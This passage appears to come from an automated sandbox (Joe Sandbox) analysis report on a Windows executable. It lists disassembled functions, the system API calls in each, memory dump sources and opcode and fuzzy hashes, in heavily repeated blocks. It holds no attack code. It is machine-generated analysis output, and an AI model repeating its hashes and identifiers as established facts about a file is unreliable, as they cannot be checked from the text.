                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DestroyWindow
                                                                                                                                                                                                                • String ID: msctls_updown32
                                                                                                                                                                                                                • API String ID: 3375834691-2298589950
                                                                                                                                                                                                                • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                                                                                                                • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                                                                                                                                Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                • String ID: $<
                                                                                                                                                                                                                • API String ID: 4104443479-428540627
                                                                                                                                                                                                                • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                                                                                                                • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                                                                                                                                                Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                • API String ID: 1682464887-234962358
                                                                                                                                                                                                                • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                                                                                                                • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                                                                                                                                Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                • API String ID: 1682464887-234962358
                                                                                                                                                                                                                • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                                                                                                                • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                                                                                                                                Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                • API String ID: 1682464887-234962358
                                                                                                                                                                                                                • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                                                                                                • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                                                                                                                                Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                • API String ID: 2507767853-234962358
                                                                                                                                                                                                                • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                                                                                                • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                                                                                                                                Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                • API String ID: 2507767853-234962358
                                                                                                                                                                                                                • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                                                                                                • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                                                                                                                                Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                • String ID: msctls_trackbar32
                                                                                                                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                                                                                                • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                                                                                                                                Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                                                                                                                                                • String ID: crts
                                                                                                                                                                                                                • API String ID: 943502515-3724388283
                                                                                                                                                                                                                • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                                                                                                                                                • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                                                                                                                                Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                                                                                                                                • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorMode$LabelVolume
                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                • API String ID: 2006950084-234962358
                                                                                                                                                                                                                • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                                                                                • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                                                                                                                                Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                                                                                                                                • DrawMenuBar.USER32 ref: 00449761
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 772068139-4108050209
                                                                                                                                                                                                                • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                                                                                                                                                                • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                                                                                                                                Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcslen$_wcscpy
                                                                                                                                                                                                                • String ID: 3, 3, 8, 1
                                                                                                                                                                                                                • API String ID: 3469035223-357260408
                                                                                                                                                                                                                • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                                                                                                                • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                                                                                                                                                Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
